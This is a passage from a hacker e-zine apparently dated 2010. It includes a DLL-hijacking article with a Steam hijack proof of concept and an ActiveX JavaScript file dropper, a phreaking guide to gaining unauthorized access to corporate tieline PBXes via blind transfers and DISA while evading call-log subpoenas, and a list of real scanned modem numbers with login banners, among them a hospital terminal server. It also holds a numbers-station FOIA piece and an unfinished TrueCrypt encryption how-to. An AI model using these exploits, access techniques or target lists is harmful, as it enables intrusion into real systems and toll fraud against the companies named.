1101 2D getnetbyname (forwarded to MSWSOCK.getnetbyname)
5 2E getpeername (forwarded to ws2_32.getpeername)
53 2F getprotobyname (forwarded to ws2_32.getprotobyname)
54 30 getprotobynumber (forwarded to ws2_32.getprotobynumber)
55 31 getservbyname (forwarded to ws2_32.getservbyname)
56 32 getservbyport (forwarded to ws2_32.getservbyport)
6 33 getsockname (forwarded to ws2_32.getsockname)
7 34 0000186E getsockopt
8 35 htonl (forwarded to ws2_32.htonl)
9 36 htons (forwarded to ws2_32.htons)
10 37 inet_addr (forwarded to ws2_32.inet_addr)
1100 38 inet_network (forwarded to MSWSOCK.inet_network)
11 39 inet_ntoa (forwarded to ws2_32.inet_ntoa)
12 3A ioctlsocket (forwarded to ws2_32.ioctlsocket)
13 3B listen (forwarded to ws2_32.listen)
14 3C ntohl (forwarded to ws2_32.ntohl)
15 3D ntohs (forwarded to ws2_32.ntohs)
1102 3E rcmd (forwarded to MSWSOCK.rcmd)
16 3F 000017A8 recv
17 40 00001808 recvfrom
1103 41 rexec (forwarded to MSWSOCK.rexec)
1104 42 rresvport (forwarded to MSWSOCK.rresvport)
1108 43 s_perror (forwarded to MSWSOCK.s_perror)
18 44 select (forwarded to ws2_32.select)
19 45 send (forwarded to ws2_32.send)
20 46 sendto (forwarded to ws2_32.sendto)
1105 47 sethostname (forwarded to MSWSOCK.sethostname)
21 48 000018E0 setsockopt
22 49 shutdown (forwarded to ws2_32.shutdown)
23 4A socket (forwarded to ws2_32.socket)
Summary
1000 .data
1000 .reloc
1000 .rsrc
3000 .text
C:\Users\storm\Desktop\src>g++ wrappit.cpp -o wrappit.exe
C:\Users\storm\Desktop\src>wrappit.exe wsock32.dll exports.txt __stdcall C:\\Windows\\System32\\wsoc
k32.dll wsock32.cpp wsock32.def
Wrappit. Copyright (C) Chourdakis Michael
Usage: WRAPPIT <dll> <txt> <convention> <new dll name> <cpp> <def>
==================================================================
Step 1: Parsing exports.txt...
Step 1: 75 exported functions parsed.
------------------------------------------
Step 2: Generating .DEF file wsock32.def...
Step 2: 75 exported functions written to DEF.
------------------------------------------
Step 3: Generating .CPP file wsock32.cpp...
cl : Command line warning D9035 : option 'Wp64' has been deprecated and will be removed in a future
release
wsock32.cpp
Creating library wsock32.lib and object wsock32.exp
Generating code
Finished generating code
C:\Users\storm\Desktop\src>
And this is where I will leave you. :)
VI. Omg Hax
===========
Many flaws in web browsers allow files to be downloaded to a victim's computer but not executed
(arbitrary file download), leaving the attacker hoping that it's opened either intentionally or
accidentally. With DLL hijacking, exploits such as these do not have to rely on a user directly
interacting with the file, which usually leads to exposure of an attack. Instead, a malicious DLL
file targeting a popular program may be dropped to a location that will be searched before the
actual, legitimate DLL is found. Or, in a case like this, where the actual DLL is missing
altogether:
/*
Exploit Title: Steam DLL Hijacking Exploit (steamgamesupport.dll)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Tested on: Windows Vista SP2
http://www.gonullyourself.org/
gcc -shared -o steamgamesupport.dll Steam-DLL.c
For whatever ungodly reason, Steam searches PATH for steamgamesupport.dll but never finds it.
Shall we help it?
*/
#include <windows.h>
int hax()
{
WinExec("calc", 0);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
hax();
return 0;
}
The following code, provided by SubSyn, acts as a basic example of a file dropper. It will produce
one script warning when executed. The code with no script warnings will remain unreleased. :)
<html>
<head></head>
<body>
<script language="javascript">
var fso = new ActiveXObject("Scripting.FileSystemObject");
var myfile = fso.CreateTextFile("C:\\Program Files\\Steam\\steamgamesupport.dll",true);
myfile.WriteLine("compiled DLL contents");
myfile.Close();
document.location='http://www.intel.com';
</script>
</body>
</html>
[1] http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx
[2] http://msdn.microsoft.com/en-us/library/ms682583%28VS.85%29.aspx
[3] http://www.nirsoft.net/utils/dll_export_viewer.html
[4] http://blog.metasploit.com/2010/08/better-faster-stronger.html
[5] http://digitalacropolis.us/?p=113
[6] http://www.exploit-db.com/papers/14813/
[7] http://www.attackvector.org/new-dll-hijacking-exploits-many/
[8] http://www.attackvector.org/autorun-dll-hijacker-usb-stick/
[9] http://www.codeproject.com/KB/DLL/CreateYourProxyDLLs.aspx
[10] http://www.codeproject.com/KB/DLL/CreateYourProxyDLLs/src.zip
[11] http://gonullyourself.org/downloads/wrappit.cpp
[12] http://support.microsoft.com/kb/815065
[13] http://www.network-theory.co.uk/docs/gccintro/gccintro_25.html
[14] http://kb.iu.edu/data/akqn.html
[15] http://support.microsoft.com/kb/2389418
[16] http://www.microsoft.com/technet/security/advisory/2269637.mspx
[17] http://support.microsoft.com/kb/2264107
[18] http://www.cs.ucdavis.edu/research/tech-reports/2010/CSE-2010-2.pdf
[19] http://blog.acrossecurity.com/2010/09/binary-planting-goes-exe.html
[20] http://msdn.microsoft.com/en-us/library/ms682425%28VS.85%29.aspx
[21] http://msdn.microsoft.com/en-us/library/ms687393%28VS.85%29.aspx
[22] http://msdn.microsoft.com/en-us/library/ms684183%28VS.85%29.aspx
[23] http://msdn.microsoft.com/en-us/library/20y988d2%28v=VS.80%29.aspx
[24] http://msdn.microsoft.com/en-us/library/431x4c1w%28VS.80%29.aspx
[==================================================================================================]
-=[ 0x07 Numbers Stations FOIA Request
-=[ Author: teh crew
For those who are not familiar with numbers stations:
"Numbers stations (or number stations) are shortwave radio stations of uncertain origin. They
generally broadcast artificially generated voices reading streams of numbers, words, letters
(sometimes using a spelling alphabet), tunes or Morse code. They are in a wide variety of languages
and the voices are usually female, though sometimes male or children's voices are used.
Evidence supports popular assumptions that the broadcasts are used to send messages to spies. This
usage has not been publicly acknowledged by any government that may operate a numbers station, but
in 2001, the United States tried the Cuban Five for spying for Cuba. The group had received and
decoded messages that had been broadcast from a Cuban numbers station.[1] Also in 2001, Ana Belen
Montes, a senior US Defense Intelligence Agency analyst, was arrested and charged with espionage.
The federal prosecutors stated: "Montes communicated with the Cuban Intelligence Service through
encrypted messages and received her instructions through encrypted shortwave transmissions from
Cubaî. In 2006, Carlos Alvarez and his wife Elsa Alvarez were arrested and charged with espionage.
The U.S. District Court Florida stated: "defendants would receive assignments via shortwave radio
transmissionsî. In June 2009, the United States similarly charged Walter Kendall Myers with
conspiracy to spy for Cuba and receiving and decoding messages broadcast from a numbers station
operated by the Cuban Intelligence Service to further that conspiracy.[2][3]
It has been reported that the United States uses numbers stations to communicate encoded information
to persons in other countries.[1]
Numbers stations appear and disappear over time (although some follow regular schedules), and their
overall activity has increased slightly since the early 1990s. This increase suggests that, as
spy-related phenomena, they were not unique to the Cold War."
- http://en.wikipedia.org/wiki/Numbers_station
"A search of Commission records located a number of documents concerning "the operation of domestic
and foreign numbers stations." No records were found, however, with respect to the decoding of the
messages that numbers stations broadcast. The records responsive to your request must be withheld
under FOIA Exemption 7(E), 5 U.S.C. ß 552(b)(7)(E); see 47 C.F.R. ß 0.457(g)(5), which permits us to
withhold records where release would "disclose techniques and procedures for law enforcement
investigations or prosecutions, or would disclose guidelines for law enforcement investigations or
prosecutions if such disclosure could reasonably be expected to risk circumvention of the law[.]"
We have also reviewed the records to determine if any parts may be released and concluded no
portions of the records may be segregated and released. See 5 U.S.C. ß 552(b) (sentence immediately
following exemptions); Memorandum for Heads of Executive Departments and Agencies, Freedom of
Information Act, 74 FR 4683 (2009) (President Obama's memorandum concerning the FOIA); Memorandum
for Heads of Executive Departments and Agencies, Freedom of Information Act,
http://www.usdoj.gov/ag/foia-memo-march2009.pdf, (Attorney General Holder's FOIA Memo)."
Having spoken to an attorney at the FOIA office over the phone, he requested a 30-day extension due
to the sheer amount of information uncovered.
Interesting.... The government won't even release redacted documents on the topic.
Not to worry; we're working on it. More to come.
[==================================================================================================]
-=[ 0x08 Exploring Tieline Networks
-=[ Author: Shadytel, Inc
-=[ Website: http://www.shadytel.com/
Anybody who hasn't been living under a rock is familiar with PBXes - the smaller, more compact
business phone systems we know and love (particularly all you shady folks who need an easy way to
conceal ANI). While PBX manufacturers learned over a decade ago that prohibiting a blind transfer to
9+anything is an easy way to put an end to this mischief, the digit 8 is a completely different
story. 8 will often give you a second dialtone, but a very different one.
Long distance for businesses has never been cheap for anyone, not even the providers. Extra "because
we can" fees aside, businesses use far too many minutes to make an unlimited plan profitable for all
but the dodgiest carriers. That's where tielines come in. Sometimes, it makes more sense to make
your own network if most of your calls are between different branches. Not only do the calls only
cost whatever it takes to keep the equipment running, but you can make the dialplan whatever the
hell you like. Rather than having separate digits for tieline/PSTN outdial, a company could have the
PBX catch 1-700-222-xxxx and assign different stores their extensions based on the store ID.
Eventually, long distance companies started realizing that everybody liked the idea of a tieline,
but nobody liked the idea of laying cable or provisioning switches. For this reason, most of what
you'll find will end up going over a conventional long distance carrier anyway (with special pricing
arrangements), but depending on where you look, what you'll find will end up being very different.
On one end of the spectrum is Macy's and their shiny new IP tieline network (or more accurately, a
Sprint corporate account dubbed the Federated Tieline Network). This baby features interactive "not
in service" messages, voice directories, and Rolm PBXes. On the other end is the Dominion tieline
network. Dominion's network, before being sold to Cavalier Telephone, was completely homemade. The
fiber spanning from New York well into the dirty South was in-house, the switches were in-house, and
the ancient, sometimes not even digital PBXes mostly interconnected by 4-wire analog trunks to the
PSTN are most definitely still alive, kicking, and retrofitted with equally ancient voicemail
systems; mostly either Siemens, or pre-Avaya Octel. In a twist of bitter irony, the Dominion network
sounds consistently better.
Getting in
-----------
If you've ever spent more than two minutes scanning, playing with some doohickey you found on the
network, or otherwise, well, anything, you probably know how hard it is to stick to a plan. You can
never predict security flaws or outright generosity. The tieline world is pretty much the same.
Unless you're absolutely sure whichever PBX stands between you and a tieline is vulnerable, you'll
be a lot better off poking across multiple businesses than just pounding your head against one.
While it isn't always absolute, keep in mind that large corporate customers aren't just big users of
tielines - they're also big fans of standardized software/hardware configuration. If you find one,
you can most certainly find them all, but if you're not having any luck with two or three PBXes
owned by the same company, it's a safe bet that you'll have a far more rewarding experience with
something else. Be sure, though, that any of this is even necessary. Companies like IBM leave their
tieline open to anyone. Whenever you transfer to someone in the company, the IVR gives you the
option of transferring to a tieline extension instead.
Asking nicely
-------------
Before even trying to pull leet hax on your local PBX, try it! If it's worked for people getting
onto store PA systems for over 15 years, it can most definitely work for you. As compelling as the
word "please" can be, knowing what they actually call the tieline is a hundred times more
compelling. Ecompany we've encountered so far will refer to a tieline on the 8 level as 'tieline 8',
but if you're not sure, you can always snag yourself an extension card. Failing that, even a Google
search will go a long way. For example, "tieline 8" +IBM (with quotes) will find you emails from IBM
employees giving their 7-digit tieline extensions for contact. Macy's/Bloomingdale's/other companies
under the same corporate umbrella refer to their tieline as Fednet (no obvious relation to efNet,
but we suspect otherwise) and have a full ten-digit dialing plan.
Blind Transfer
--------------
As the name implies, a blind transfer is an operation done by an IVR where it'll just flash over,
give the PBX an extension, and with absolutely no checking at all will drop out, leaving you to
whatever illicit goodies you're about to obtain. As we established earlier, PBX manufacturers have
taken care to ensure the one thing that's guaranteed to piss off their customers won't happen, but
it's otherwise wide open.
Conference calls
----------------
Corporate conference calls will more often than not have a tieline extension to avoid busying out
their PSTN lines (while saving money in the process). Fortunately for us, a number of these are
extra special conference circuits with dialout capabilities. While finding these is an effort we
leave to the reader (they're real though, we swear!), imagine the benefits. How cool would it be to
gather all your leet phreakz0r buddies onto a private long distance network? Especially if a long
distance security department is "service observing" one of your friends on a conference call.
Physical Access
---------------
It sounds stupid, but if you need to place one call or want to verify something before going through
the trouble of gaining remote access, it's a good idea. Most large stores have a number of
unattended phones. Target even encourages you to use them if you need assistance. A number of Macy's
stores will have courtesy phones with tieline access in the dressing room areas. Just remember that
you're not the first person to do shady things near a dressing room, and there is a camera pointing
straight at you. This means plugging your computer into the phone line will trigger a security guard
to magically appear.
Let's say this particular Macy's - or any other store you may happen to be at - doesn't have a
courtesy phone, and all you have to work with is a phone with a hotline arrangement. In most Macy's,
this is pretty popular. There'll be phones in an out-of-the-way location, usually near an elevator,
marked with something like "Pick up to be connected to the Macy's credit line" specifically for
customers to use. Depending on the store configuration, you'll see either a Rolm PBX phone with a
magnetic (no visible) hookswitch, or a Western Electric 2554 clone. Either way, when you pick up the
phone, you'll be greeted with several seconds of silence, and finally, an IVR with some horrible
CELP codec: "Hello, and thank you for calling the Macys credit line! If you think Shadytel is great,
press one. Otherwise, please record all your personal information after the tone, and a
representative will reimburse your card with advertising revenue."
If you're on a 2554 clone: Just flash and you'll be greeted with dialtone!
If you're on a Rolm PBX phone: Look near the bottom for three line buttons. If they're not labeled,
either making an attempt to transfer (right-most button), or pressing connect (center) will get you
a PBX dialtone.
For the most part, these phones seem to not have any restrictions. Tieline access is unrestricted,
but dialout is a little perplexing. From the stores we've tried it from, you can simply dial 800
numbers as 9+, and they'll go through without a problem. Local calls seem to be another story. The
PBX will wait for a few moments, presumably for extra digits, and then give you its version of
reorder.
DISA
----
DISA, or Direct Inward System Access, is a PBX function usually only found on larger systems, both
new and old. Fortunately for us, the companies that have PBX DISAs are also the very same ones who
have tielines!
So acronyms aside, a DISA is like an extender. Imagine being in the headquarters of Megacorp USA and
finding a courtesy phone in their lobby, but being able to be at that phone from anywhere in the
world by dialing a phone number.
Well, are you going to let a phone that the general public uses have unrestricted access to the
network? Of course not - that phone is going to be locked down like a maximum security prison. So,
that's pretty much a DISA. Imagine being able to be at that phone from anywhere in the world simply
by dialing a phone number. Only, without the being supervised part. Or the having to be
identifiable part.
Locked down or not, that DISA gives you an advantage. Instead of looking like any other outside
caller, you instead look like someone calling from inside the network. To the employees, the PBX -
EVERYTHING. Except the DISA itself. Depending on the PBX type, it might give you some social
engineering opportunities or access to some interesting vertical service codes, but that still
doesn't solve your problem.
Well, it wouldn't just give you the unrestricted ability to access the rest of the network if you
called the DISA from what looks like an inside line, would it? Yes, some PBX manufacturers (we're
looking at you, Avaya!) have some serious explaining to do.
Getting Around
--------------
Sometimes getting around in a tieline dialplan is easy. Like on Fednet, if you dial an invalid
number, an IVR will intercept you and offer you a directory. Sorta like Clippy, only with less urge
to kill it.
Other times, it's convoluted, fucked up, and just plain mean. Since the network that's both the most
interesting and the most confusing happens to be the one we're most experienced with, we'll use the
Dominion network as an example. The moment you or whatever you have doing your evil bidding presses
8, you'll be taken right out of the office and onto the endless pile of confusion that is a Dominion
tieline switch. The very basic topology of it all (end office/PBX --> tieline switch/tandem--> end
office/PBX) is pretty much the only part of it that makes sense.
If you think like us, the first thing you'll think to press is 0. No matter where you go, 0 always
goes to something, no questions asked. Not here. In fact, not even nothing will happen. The dialtone
will just keep on going, but it'll stop accepting digits. Better get used to it. If you don't
respond within seven seconds or so of getting dialtone or start dialing a prefix the tieline switch
doesn't like (555-xxxx will do it), it'll do the exact same thing. Fear not, though - it's not all
bad. If you're trying to search around for a working tieline exchange, it's pretty easy to tell if
you've actually found something or if you're just stumbling around in the dark.
The way exchanges are formatted within the Dominion network are a little like Russia's PSTN. The
exchange itself is a bit like a container for a number of sub-exchanges, but it's provisioned
geographically, a bit like an area code. Every tieline switch knows that Eastern Node #2, serving
northern Virginia, handles the codes 723 and 724, so they'll pass anything within those two codes to
it. If you dial a non-working sub-exchange in 723/724, you'll get a recording from Eastern Node #2.
Dominion doesn't have it set up like most SS7-enabled networks where the terminating long distance
tandem will send a cause code with a non-working number condition back to the originating long
distance tandem. If you dial a non-working number within 724-39xx, you'll get a recording from
Portsmouth Tech Center #3, the PBX serving that hundred block.
So to recap, it works like this:
Invalid exchange --> The tieline switch placing your call gives you a recording
Invalid sub-exchange --> The tieline switch placing your call sends it to the tieline switch serving
the exchange, which gives you a recording
Invalid extension --> Wrong number message from the PBX you're trying to call
Figuring out which tieline switch you're sending your calls from is pretty simple. As of this
writing, 425 and 699 are both non-working codes, so anything within either of those two will get you
the recording from your tieline switch.
While we're on the topic of Dominion, here are a few things to keep in mind, should you ever work
your way into their twisted corporate ladder.
- The non-working extension recording for their corporate headquarters tells you to "consult
your Internet or telephone directory". Do they really mean Internet or intranet?
- If you're calling from the tieline network, it's very possible your call might look exactly
like a call from within the same building. We've had attendants offer to "come over there and
help us".
- There really are some form of at least pseudo-electromechanical switches on the network, like
724-00xx.
- 736-4636 (or 804-771-4636 via PSTN) is their IT help line.
Benefits
--------
Other than for the fun of exploration, why would you want to gain access to a tieline? As you're
more than likely a residential customer (unless you happen to want ISDN and live somewhere where
it's only tariffed as a business service), why on earth would you need to travel through a tieline
network?
With all seriousness, the best answer to this question boils down to two words: FOR SCIENCE! Like a
toy, you probably don't want access to a tieline because it's going to be of any financial value.
You want it because it's fun. The switching equipment that runs a homegrown tieline network is
unlike anything else. The equipment is completely unregulated. You can make a switch out of
mousetraps and put it in your network, or route calls based on some convoluted numbering scheme that
not even Soviet Union dictators can understand. If you need an even better reason, keep in mind that
unregulated means no CALEA. If you want to re-originate a call from Alaska while lying in your
Kaiser Permanente hospital bed, then... well, dammit, good for you. The network is going to be more
than likely unprepared for call log subpoenas (if it even carries ANI at all). If you want to
perform an insane corporate espionage feat, could you get any more convincing than having
slack-jawed Red Thomas call from the Hill Valley drilling site?
Oh, did we mention the DSN is a tieline network?
So let's just put it this way - what you do with a tieline is limited to your resourcefulness.
The end.
[==================================================================================================]
-=[ 0x09 Modem Numbers
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/
The following is a list of modems from various scans posted to the site, along with scans from the
Scan A Day project. The Scan A Day project was conceived on the BinRev forum by samo in late 2008
but unfortunately lost steam about a year later. The project and content archive has since been
handed off to GNY and can be found at http://scanaday.gonullyourself.org/ .
Numbers within this list that were not scanned by me were submitted to GNY or Scan A Day by
ThoughtPhreaker, samo, whye, Lucky225, and Decimalz.
The CNAM result of each number has also been included. Comments are preceded with #.
All connections were made at 1200 baud, 8N1 unless noted otherwise.
If you are interested in dialing some of these numbers, then check out HyperTerminal, a program able
to dial out from and interface with modems. You may have a usable modem in your desktop or laptop
and not even realize it!
================================================================================
207-324-9906
VERIZON
M857tM857tM857tM857tM857tM857tM857t
================================================================================
212-202-0000, 7E1
New York NY
Welcome to your internet access switch
Unauthorized access is not permitted
Please enter your name and password at the prompt
Login:
================================================================================
212-287-0000
REUTERS AMERICA
# What's with the repeating text?
~ }#¿!}!}!} '}"}&} }*} } }#}%¬#}%}%}&l<Å,}'}"}(}"}1}$}%Ù}3}*}!EDTRH30»Ω~~ }#¿!}!
}"} '}"}&} }*} } }#}%¬#}%}%}&l<Å,}'}"}(}"}1}$}%Ù}3}*}!EDTRH30ÅJ~~ }#¿!}!}#} '}"}
&} }*} } }#}%¬#}%}%}&l<Å,}'}"}(}"}1}$}%Ù}3}*}!EDTRH30I‡~~ }#¿!}!}$} '}"}&} }*} }
}#}%¬#}%}%}&l<Å,}'}"}(}"}1}$}%Ù}3}*}!EDTRH30}"¨~~ }#¿!}!}%} '}"}&} }*} } }#}%¬#
}%}%}&l<Å,}'}"}(}"}1}$}%Ù}3}*}!EDTRH30 }&~~ }#¿!}!}&} '}"}&} }*} } }#}%¬#}%}%}&l
<Å,}'}"}(}"}1}$}%Ù}3}*}!EDTRH30ÉÒ~~ }#¿!}!}'} '}"}&} }*} } }#}%¬#}%}%}&l<Å,}'}"}
(}"}1}$}%Ù}3}*}!EDTRH30K[~~ }#¿!}!}(} '}"}&} }*} } }#}%¬#}%}%}&l<Å,}'}"}(}"}1}$}
%Ù}3}*}!EDTRH30}5i~~ }#¿!}!})} '}"}&} }*} } }#}%¬#}%}%}&l<Å,}'}"}(}"}1}$}%Ù}3}*}
!EDTRH30›√~~ }#¿!}!}*} '}"}&} }*} } }#}%¬#}%}%}&l<Å,}'}"}(}"}1}$}%Ù}3}*}!EDTRH30
î4~~ }#¿!}!}+} '}"}&} }*} } }#}%¬#}%}%}&l<Å,}'}"}(}"}1}$}%Ù}3}*}!EDTRH30\û~
================================================================================
212-336-0000
WELLPOINT INC
# Television station in New York
WPNY
2.6.11-AV18login:
================================================================================
212-342-0000
NEW YORK PRESBY
# Looks like an access point to a network of universities - this thing is crazy-interesting. The
selections I made went to login prompts.
************************************************************************
* AUTHORIZED USE ONLY *
* Any use of this system is logged and monitored. Trespassers and *
* unauthorized users will be prosecuted to the fullest extent of *
* the law. If you are not supposed to be here: Leave Now! *
************************************************************************
[whitespace]
Server "isdn-pri-gw" Line 73 Terminal-type (unknown)
************************************************************************
* *
* NYP TERMINAL SERVER AT CUMC *
* --------------------------- *
* AUTHORIZED USE ONLY *
* *
* Any use of this system is logged and monitored. Trespassers and *
* unauthorized users will be prosecuted to the fullest extent of *
* the law. If you are not supposed to be here: Leave Now! *
************************************************************************
1 Laboratory System (CPBX)
2 Radiology System (CPRAD)
3 Medical Records (Intellus System) (CPMR)
4 Pocket Signout Editor (PSE) (WASH)
5 Columbia University E-Mail System (CUNIX)
6 ATT Route Server
7 FLUX (SSH ONLY)
8 West Campus Mainframe (PHIS)
9 East Campus Cerner System (JURASSIC)
10 East Campus Cerner System (BRONTO)
11 East Campus Cerner System (STEGO)
12 East Campus TREX System
13 Siemens Eagle System
18 Disconnect
Selection:
================================================================================
212-495-0105
COMPUTERSHARE,G
# Computershare is a data management and financials company.
NYCSCYC1!login:
================================================================================
254-939-4471
BELTON SHPG CTR
U™U™"^Ÿ
================================================================================
254-939-4475
CRESTV MANOR NR
~?~?~?~?~?~?~?~?~?~?~ø´U`By`ŸøÂd3Ngìh5ô
[whitespace]
@ ƒZˆﬂ‡Gâ¿ƒ>Î~?‡-;=N2ç2H˝5i§M:k
(eUâ8±Kî®L[êi-KzVÉi2
================================================================================
254-939-9732
Belton TX
couldn't connect successfully
================================================================================
315-287-9935
NYS DEPT OF COR
# New York State Department of Correctional Services, apparently
[blank, type LOGIN for login]
================================================================================
360-330-0005
QWEST CORP
# Weird ? prompt
?
================================================================================
360-330-0010
QWEST COMM
# Weird ? prompt
?
================================================================================
360-330-0016
QWEST CORP
# Weird ? prompt
?
================================================================================
360-330-0061
Centralia WA
couldn't connect successfully
================================================================================
503-266-1056, 7E1
Canby OR
# Earthquake monitoring station
CONNECT 9600
INVALID USERID
PLEASE ENTER USERID FOR CNBY
<
================================================================================
503-266-1057
Canby OR
[blank]
================================================================================
518-732-2921
# COCOT payphone
NNN
================================================================================
715-386-0020
HUDSON HOCKEY A
[blank]
================================================================================
715-386-0053
Hudson WI
# Weird < prompt
<
================================================================================
715-386-0055
Hudson WI
# Weird < prompt
<
================================================================================
757-430-9920
PAYPHONE
[blank]
================================================================================
757-543-9997
LUCENT TECH
# Perhaps the banner is a serial number? It returns no Google results.
STA06214028
login:
================================================================================
757-865-9922
CORP BLLNG BELL
wFKoff€∆ñäu2=ÏRì˘ XÂÉÒﬂ∆Uva°R˘˘◊∑MÔﬁÖÖI˝Ã+◊‡∫I˙Ñ•ƒ¡M
================================================================================
775-289-0002
ATT
# Identified by RP as an FDMA radio PBX
COLLINS EXCHANGE RADIO
CXR-424
***** MAIN MENU *****
1. SYSTEM PROVISIONING
2. RADIO CHANNEL STATUS
3. SUBSCRIBER LINE STATUS
4. SUBSCRIBER TERMINAL STATUS
5. ALARM STATUS
6. PERFORMANCE REPORTS
7. DIAGNOSTICS
8. INSTALLATION
9. CHANGE PASSWORD
10. LOG OFF
Enter selection number and return key [ ]
================================================================================
775-289-0017
Bell Nevada
couldn't connect successfully
================================================================================
800-226-1337
A§5:JÉÎéòäl∑[Q\Î ã:IY˛¢gßn≈∞âÙ–Nß8≠‰Å€2?Ú¶·ÁP j]F
================================================================================
800-236-2622
# Haha, a dial-up toll-free BBS!
Auto-sensing...
WELCOME!
hpprwhwbbs (#58817025)
Running Worldgroup by GALACTICOMM
ONLINE 9600 BAUD AT 17:19 09-AUG-10
If you already have a User-ID on this
system, type it in and press ENTER.
Otherwise type "new":
================================================================================
800-456-6855
[blank]
================================================================================
800-468-2622
g£¿ÔË˙∆rK– »ÉjÑöÿπËÌ¿lÖYÒ|ΩôˆÇÔ´y∂íœtÅ?HóÕÙ≈ú¶•N`
================================================================================
800-507-9935
IrYKFN>~ytv
gXYfbU*sL3IYm35I1J|lLU8EUUIdES0wC*4N{[
[whitespace]
iT
E</Zj %pH<
[whitespace]
~?~?~?~?~?~?~?~?~?~?~?ﬂ®6saπ›ŒKÅ‰e;.Ê@ ê[œ~?ﬂ‡«ƒ@ÔÁ~?CëQL3Tç$î¥UP≥U§¢çÑ±
ÌöçTCT∂3XB4F9ÇF_
================================================================================
800-535-9935
couldn't connect successfully
================================================================================
800-543-9935
couldn't connect successfully
================================================================================
800-761-1337
# DOW Networks is a telecommunications services provider.
------------------------------------------------------------
This gateway is the property of DOW Networks.
All unauthorized access is strictly forbidden!
------------------------------------------------------------
Username:
================================================================================
800-801-6855
couldn't connect successfully
================================================================================
800-810-6855
[blank]
================================================================================
800-878-6855
couldn't connect successfully
================================================================================
800-888-6855
couldn't connect successfully
================================================================================
800-891-6855
couldn't connect successfully
================================================================================
847-359-9957, 7E1
LYSAKOWSKI, PET
# Still garbled text, but 7E1 returned more ASCII characters over 8N1
?~?~?~?~?~?~?~?~?~?~?Zcu_hSr9N3n4
[whitespace]
@ Ddx_`GD@D8%?p,I&x(4%+j0&
I-*2P4)!+JNXa F
[whitespace]
K~%)HI
================================================================================
847-359-9966, 7E1
TEDDYS LIQUOR S
# Still garbled text, but 7E1 returned more ASCII characters over 8N1
~?~?~?~?~?~?~?~?~?~?~+U@B(D~el1G3n4
[whitespace]
@ $p_`C @DF}~A%
u;5'! y#V<-J|IqjC,]eC.eVXJ%0b3Q3
================================================================================
847-359-9977, 7E1
PLUM GROVE DENT
# Still garbled text, but 7E1 returned more ASCII characters over 8N1
~?~?~?~?~?~?~?~?~?~?+U@B(D~]n9N'3n4@ 8?N\!0AN~@E$b2bMRVE/Q
*02tJ"
"cR
[whitespace]
Qa%
================================================================================
847-359-9980, 7E1
LUMEX INC
# Still garbled text, but 7E1 returned more ASCII characters over 8N1
~?~?~?~?~?~?~?~?~?~?~et@%&U*a,9@ d@?~n|b`"os~?@XFTV4:)#01,52, P
L!DtOEh`B(
================================================================================
847-359-9985, 7E1
Jasin Alan
# Still garbled text, but 7E1 returned more ASCII characters over 8N1
~?~?~?~?~?~?~?~?~?_$X@cu_(r9N3@ Cp 8S?n|b D8%?~p2 DE%@ADI$mUdF)
)UAD;* PIcEf
================================================================================
907-848-8888
Venetie AK
# Siemens PBX prompt?
CMS>
================================================================================
907-849-8888
Venetie AK
# Siemens PBX prompt?
CMS>
================================================================================
907-967-8888
Goodnews Bay AK
# Siemens PBX prompt?
CMS>
================================================================================
909-390-0047
FRIDAY'S
[blank]
[==================================================================================================]
-=[ 0x0a Linux Full-Disk Encryption Using TrueCrypt
-=[ Author: second
-=[ IRC: irc.distrust.us #gny
-=[ IRC: irc.digitalrebels.org #null
= Introduction =
This is a HOW-NOT to leave your root filesystem encrypted
For this I'm using Arch Linux, but it should be easily ported to other Linux distributions. I've
created a TrueCrypt init hook to go with the mkinitcpio that is made for Arch Linux - many other
distros have something similar to this. It's basically a set of scripts and binaries run before init
to prepare the system (mount filesystems, decrypt the root filesystem, etc. It can even do NFS root
filesystems), and then calls init (runs graphical login manager or consoles, etc.).
Pre-requisites:
* Live CD/USB or a system already running Arch Linux (You aren't restricted to just Arch Linux, but
thats what I'm using. If you know what you're doing, you can reference the wiki article
http://wiki.archlinux.org/index.php/Install_from_Existing_Linux and improvise.)
* Root access
* A internet connection or local access to the TrueCrypt packages/binaries
* Patience, ALWAYS double check your commands
It would help you to know how to:
* Use the command line
* Partition a drive
* Create a filesystem on a partition
Now that you have what you need, let's begin.
I'm going to create a bootable system on another drive that has the root filesystem encrypted with
TrueCrypt. This HowTo is intended for hard drives, but it should also work with a USB device with a
few changes.
WARNING: I am in no way responsible for your actions, data loss, or whatever.
USE THIS AT YOUR OWN RISK.
Now that the disclaimer is out of the way...
= Formating and Partitioning The Disk =
# ls /dev/sd*
/dev/sda /dev/sda1 /dev/sda2 /dev/sdb /dev/sdb1
/dev/sdb is the drive I'll be installing to. It may be different on your system, so be sure to check
using `fdisk -l`. I suggest you have a drive that is at the very minimum 2G. 4G is better (that's
what I'm using).
First, I need to format my drive with a /boot partion. I'll use 300M, although it could be smaller.
I tend to store other things there too sometimes and a partition for the root filesystem.
NOTE: If your /boot is too small, you will have to come back to this step and do it over again. It
needs enough room for one kernel and two initrd which, because it's holding TrueCrypt and all the
necessary libraries for TrueCrypt, may become quite large.
== Partitoning ==
I will use fdisk for partitioning my drive. Replace /dev/sdb with whichever drive you are using.
# fdisk /dev/sdb
fdisk /dev/sdb
Command (m for help): m
Command action
a toggle a bootable flag
b edit bsd disklabel
c toggle the dos compatibility flag
d delete a partition
l list known partition types
m print this menu
n add a new partition
o create a new empty DOS partition table
p print the partition table
q quit without saving changes
s create a new empty Sun disklabel
t change a partition's system id
u change display/entry units
v verify the partition table
w write table to disk and exit
x extra functionality (experts only)
Command (m for help): o
Building a new DOS disklabel with disk identifier 0x3a67b018.
Changes will remain in memory only, until you decide to write them.
After that, of course, the previous content won't be recoverable.
Warning: invalid flag 0x0000 of partition table 4 will be corrected by w(rite)
Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4, default 1): 1
First sector (2048-7856126, default 2048):
Using default value 2048
Last sector, +sectors or +size{K,M,G} (2048-7856126, default 7856126): +300M
Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4, default 2): 2
First sector (616448-7856126, default 616448):
Using default value 616448
Last sector, +sectors or +size{K,M,G} (616448-7856126, default 7856126):
Using default value 7856126
Command (m for help): a
Partition number (1-4): 1
Command (m for help): w
The partition table has been altered!
Calling ioctl() to re-read partition table.
Syncing disks.
# fdisk -l /dev/sdb
Device Boot Start End Blocks Id System
